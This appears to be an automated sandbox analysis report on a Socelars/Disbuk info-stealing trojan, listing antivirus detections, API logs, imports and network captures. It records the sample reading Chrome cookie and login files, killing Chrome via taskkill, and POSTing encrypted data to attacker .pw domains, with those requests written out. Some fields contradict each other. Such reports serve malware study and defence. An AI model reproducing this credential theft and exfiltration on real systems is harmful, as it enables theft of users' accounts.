10.6
0-day

953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489

7f9a498cc692f9f3f0cfe241c80e8ad8.exe

Analysis duration

74s

Latest analysis

File size

1.4MB
Static detections / Dynamic detections: AGEN AI SCORE=87 AIDETECTVM ALTA ATTRIBUTE BARYS CONFIDENCE DISBUK EXTENSION GENERICRXLT HIGH CONFIDENCE HIGHCONFIDENCE KFIH MALWARE1 MALWARE@#1DSW0SVBTYQW8 OJZDQNX2GBQ R002C0WHM20 R349445 SCORE SOCELARS SUSGEN TIGGRE TROJANPWS UNSAFE W10@AYJEANMJ ZEXAF
Eagle Eye engine
Not detected: no Eagle Eye engine detection result available
Static verdict
Antivirus engines
Engine Result Date Version
Alibaba TrojanSpy:Win32/Socelars.cacce7a7 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Kingsoft 20201028 2013.8.14.323
McAfee GenericRXLT-RQ!7F9A498CC692 20201028 6.0.6.653
Tencent Script.Adware.Extension.Alta 20201028 1.0.0.1
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
Static indicators
Queries for the computername (2 events)
Time & API Arguments Status Return Repeated
1620808774.343625
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620811551.421375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Command line console output was observed (1 event)
Time & API Arguments Status Return Repeated
1620811551.953375
WriteConsoleW
buffer: 错误: 没有找到进程 "chrome.exe"。
console_handle: 0x0000000b
success 1 0
This executable has a PDB path (1 event)
pdb_path F:\facebook_svn\trunk\database\Release\searzar.pdb
Tries to locate where the browsers are installed (2 events)
file C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)
section .gtkstar
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
resource name ZIP
Behavioral verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)
suspicious_features POST method with no referer header suspicious_request POST http://www.nicekkk.pw/Home/Index/getdata
suspicious_features POST method with no referer header suspicious_request POST http://www.dwedfe.pw/Home/Index/lkdinl
Performs some HTTP requests (2 events)
request POST http://www.nicekkk.pw/Home/Index/getdata
request POST http://www.dwedfe.pw/Home/Index/lkdinl
Sends data using the HTTP POST Method (2 events)
request POST http://www.nicekkk.pw/Home/Index/getdata
request POST http://www.dwedfe.pw/Home/Index/lkdinl
Resolves a suspicious Top Level Domain (TLD) (3 events)
domain www.dwedfe.pw description Palau domain TLD
domain www.nicekkk.pw description Palau domain TLD
domain www.ipcode.pw description Palau domain TLD
Steals private information from local Internet browsers (4 events)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions
Foreign language identified in PE resource (4 events)
name ZIP language LANG_CHINESE offset 0x0014eb50 filetype Zip archive data, at least v1.0 to extract sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000d81e
name RT_ICON language LANG_CHINESE offset 0x0013e180 filetype dBase III DBT, version number 0, next free block index 40 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00010828
name RT_GROUP_ICON language LANG_CHINESE offset 0x0014e9a8 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000014
name RT_VERSION language LANG_CHINESE offset 0x0014e9c0 filetype PGP symmetric key encrypted data - Plaintext or unencrypted data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
Creates a suspicious process (1 event)
cmdline cmd.exe /c taskkill /f /im chrome.exe
Executes one or more WMI queries (1 event)
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1620808744.968625
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (17 events)
Time & API Arguments Status Return Repeated
1620808743.968625
LookupPrivilegeValueW
system_name:
privilege_name: SeCreateTokenPrivilege
success 1 0
1620808743.968625
LookupPrivilegeValueW
system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeMachineAccountPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeTcbPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeSecurityPrivilege
success 1 0
1620808743.999625
LookupPrivilegeValueW
system_name:
privilege_name: SeTakeOwnershipPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeLoadDriverPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeRestorePrivilege
success 1 0
1620808744.015625
LookupPrivilegeValueW
system_name:
privilege_name: SeShutdownPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeRemoteShutdownPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeEnableDelegationPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeManageVolumePrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeCreateGlobalPrivilege
success 1 0
1620808744.030625
LookupPrivilegeValueW
system_name:
privilege_name: SeTrustedCredManAccessPrivilege
success 1 0
1620811551.421375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Queries for potentially installed applications (4 events)
Time & API Arguments Status Return Repeated
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
failed 2 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
failed 2 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x000004b4
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
1620808774.343625
RegOpenKeyExW
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x000004b4
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
Uses Windows utilities for basic Windows functionality (2 events)
cmdline taskkill /f /im chrome.exe
cmdline cmd.exe /c taskkill /f /im chrome.exe
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: ÀM«DÓF×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000358
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620808750.374625
RegSetValueExW
key_handle: 0x00000358
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: ÀM«DÓF×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620808750.374625
RegSetValueExA
key_handle: 0x00000370
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620808750.593625
RegSetValueExW
key_handle: 0x00000354
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Generates some ICMP traffic
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 events)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.64724
FireEye Generic.mg.7f9a498cc692f9f3
CAT-QuickHeal Trojanpws.Disbuk
ALYac Gen:Variant.Barys.64724
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Spyware ( 005484541 )
Alibaba TrojanSpy:Win32/Socelars.cacce7a7
K7GW Spyware ( 005484541 )
Cybereason malicious.cc692f
Arcabit Trojan.Barys.DFCD4
TrendMicro TROJ_GEN.R002C0WHM20
Cyren W32/Trojan.KFIH-7244
Symantec ML.Attribute.HighConfidence
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 85)
Kaspersky not-a-virus:AdWare.Script.Extension.a
BitDefender Gen:Variant.Barys.64724
AegisLab Trojan.Win32.Disbuk.i!c
Ad-Aware Gen:Variant.Barys.64724
Sophos Mal/Generic-S
Comodo Malware@#1dsw0svbtyqw8
F-Secure Heuristic.HEUR/AGEN.1124060
DrWeb Trojan.PWS.Stealer.29132
Zillya Trojan.Socelars.Win32.624
Invincea Mal/Generic-S
MaxSecure Trojan.Malware.74718079.susgen
Emsisoft Gen:Variant.Barys.64724 (B)
Ikarus Trojan-Spy.Agent
Jiangmin Trojan.PSW.Disbuk.ce
Webroot W32.Trojan.Tiggre
Avira HEUR/AGEN.1124060
Antiy-AVL Trojan[PSW]/Win32.Disbuk
Microsoft TrojanSpy:Win32/Socelars!MSR
ZoneAlarm HEUR:Trojan-PSW.Win32.Disbuk.vho
GData Gen:Variant.Barys.64724
AhnLab-V3 Trojan/Win32.Disbuk.R349445
McAfee GenericRXLT-RQ!7F9A498CC692
MAX malware (ai score=87)
VBA32 suspected of Trojan.Downloader.gen.h
Malwarebytes Spyware.Socelars
ESET-NOD32 a variant of Win32/Spy.Socelars.S
TrendMicro-HouseCall TROJ_GEN.R002C0WHM20
Tencent Script.Adware.Extension.Alta
Yandex TrojanSpy.Socelars!OjZdQNx2GbQ
Fortinet W32/Disbuk.VHO!tr.pws
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)
dead_host 172.217.24.14:443
dead_host 172.217.160.78:443
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshot was captured while this sample ran


PE Compile Time

2020-08-20 16:57:13

Imports

Library KERNEL32.dll:
0x509018 MultiByteToWideChar
0x50901c WideCharToMultiByte
0x509020 GetProcAddress
0x509024 LoadLibraryW
0x509028 GetShortPathNameA
0x509030 GetTempPathA
0x509034 GetLastError
0x509038 HeapAlloc
0x50903c GetProcessHeap
0x509040 Sleep
0x509044 GetTickCount
0x509048 FreeLibrary
0x50904c LoadResource
0x509054 SizeofResource
0x509058 FindResourceW
0x50905c LocalAlloc
0x509060 WinExec
0x509064 GetComputerNameW
0x509068 GetModuleFileNameA
0x50906c GetCurrentProcessId
0x509070 OpenProcess
0x509078 CopyFileW
0x50907c SetStdHandle
0x50908c GetOEMCP
0x509090 GetCurrentProcess
0x509094 DuplicateHandle
0x509098 CloseHandle
0x50909c WriteFile
0x5090a0 SetFileTime
0x5090a4 ReadFile
0x5090a8 SetFilePointer
0x5090ac GetFileType
0x5090b0 CreateFileW
0x5090b4 CreateDirectoryW
0x5090b8 LockResource
0x5090c0 GetACP
0x5090c4 IsValidCodePage
0x5090c8 FindNextFileW
0x5090cc FindFirstFileExW
0x5090d0 FindClose
0x5090d8 GetFileSizeEx
0x5090dc GetConsoleCP
0x5090e0 SetFilePointerEx
0x5090e4 ReadConsoleW
0x5090e8 GetConsoleMode
0x5090ec EnumSystemLocalesW
0x5090f0 GetUserDefaultLCID
0x5090f4 IsValidLocale
0x5090f8 GetCommandLineW
0x5090fc GetCommandLineA
0x509100 AreFileApisANSI
0x509108 HeapCreate
0x50910c HeapFree
0x509114 GetFullPathNameW
0x509118 GetDiskFreeSpaceW
0x50911c OutputDebugStringA
0x509120 LockFile
0x50912c GetFullPathNameA
0x509130 SetEndOfFile
0x509134 UnlockFileEx
0x509138 GetTempPathW
0x50913c CreateMutexW
0x509140 WaitForSingleObject
0x509144 GetFileAttributesW
0x509148 GetCurrentThreadId
0x50914c UnmapViewOfFile
0x509150 HeapValidate
0x509154 HeapSize
0x509158 FormatMessageW
0x50915c GetDiskFreeSpaceA
0x509160 GetFileAttributesA
0x509168 OutputDebugStringW
0x50916c FlushViewOfFile
0x509170 CreateFileA
0x509174 LoadLibraryA
0x50917c DeleteFileA
0x509180 DeleteFileW
0x509184 HeapReAlloc
0x509188 GetSystemInfo
0x50918c HeapCompact
0x509190 HeapDestroy
0x509194 UnlockFile
0x509198 LocalFree
0x50919c LockFileEx
0x5091a0 GetFileSize
0x5091ac GetSystemTime
0x5091b0 FormatMessageA
0x5091b4 CreateFileMappingW
0x5091b8 MapViewOfFile
0x5091c0 FlushFileBuffers
0x5091cc TerminateProcess
0x5091d8 SetEvent
0x5091dc ResetEvent
0x5091e0 CreateEventW
0x5091e4 GetModuleHandleW
0x5091e8 IsDebuggerPresent
0x5091ec GetStartupInfoW
0x5091f0 InitializeSListHead
0x5091f4 EncodePointer
0x5091f8 DecodePointer
0x5091fc SetLastError
0x509200 SwitchToThread
0x509204 TlsAlloc
0x509208 TlsGetValue
0x50920c TlsSetValue
0x509210 TlsFree
0x509214 GetCPInfo
0x509218 CompareStringW
0x50921c LCMapStringW
0x509220 GetLocaleInfoW
0x509224 GetStringTypeW
0x509228 RaiseException
0x50922c RtlUnwind
0x509230 LoadLibraryExW
0x509234 CreateThread
0x509238 ExitThread
0x509240 GetModuleHandleExW
0x509244 ExitProcess
0x509248 GetModuleFileNameW
0x50924c GetStdHandle
0x509250 WriteConsoleW
Library ADVAPI32.dll:
0x509004 OpenProcessToken
0x509008 LookupAccountNameW
Library SHELL32.dll:
0x509260 ShellExecuteExA
Library WININET.dll:
Library NETAPI32.dll:
0x509258 Netbios

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49181 18.235.92.123 www.nicekkk.pw 80
192.168.56.101 49186 50.17.5.224 www.dwedfe.pw 80
192.168.56.101 49178 88.99.66.31 iplogger.org 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 54178 114.114.114.114 53
192.168.56.101 58970 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://www.dwedfe.pw/Home/Index/lkdinl
POST /Home/Index/lkdinl HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.dwedfe.pw
Content-Length: 221
Cache-Control: no-cache

JSON=lY6u/p5W3ENhehiE5BeMQxJ+xNSD/+tH4Ppl2wdu1U7vc2malUsEB+ORmZS6lP/cAGsnBh0moq8witnIgq9AUEg1qhONYOV3C02wYx3B069vTH5sFH8NQvvdWQ9R9bWKBwbfuzzH6fZV/qBKCvpLU8ymIFOJz0kyCnyTWbz0Ra7guEoPJhH7+CVTzn/RkHX7QwT+s8NfoAgoPNkZpVjgjA==
http://www.nicekkk.pw/Home/Index/getdata
POST /Home/Index/getdata HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.nicekkk.pw
Content-Length: 477
Cache-Control: no-cache

JSON=tXNHCHMR5lzYrrTs/aX+4uNIiB6bvS672IwMB2lYvYHQc66Mp8UIbhF5kVVb4UWfzn98OkFNiNddN8GRyWnxDTiBqvQSO6TR4um5KK3Xhdj/3PTtH/7O+aI6meRvbJFNbjJnKPNf5wQq3Sd7QKn3lvStP0GLPKuingQrazomzGIsroY9fXHkmXtWuhAHraZ7bFEA+sIrINaaou6XuHDUjNQLPMNIHdk8drnD6uOodQ/Gga3kdx5mEy7EIoo4CPHAdH7fF7kNAIiFmml1BQBAaS8NviZpMQ8Hm3SMGF3pbsfyY0wHszek4QIEUC2JQb+HGvbOg7EPJCgbQg5PJU4N+2+0IhIlxcK8MR5zR0Ri/3+APbuEtYp3k3Xu25pFvOahnooXfqsBiIfURIujMMKlU8IX6F13XyYoTyk8FFjQiNFngLSiXeh4N2pYlstfKbU17/cgB6RbikgXWCpPEAuVGw==

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.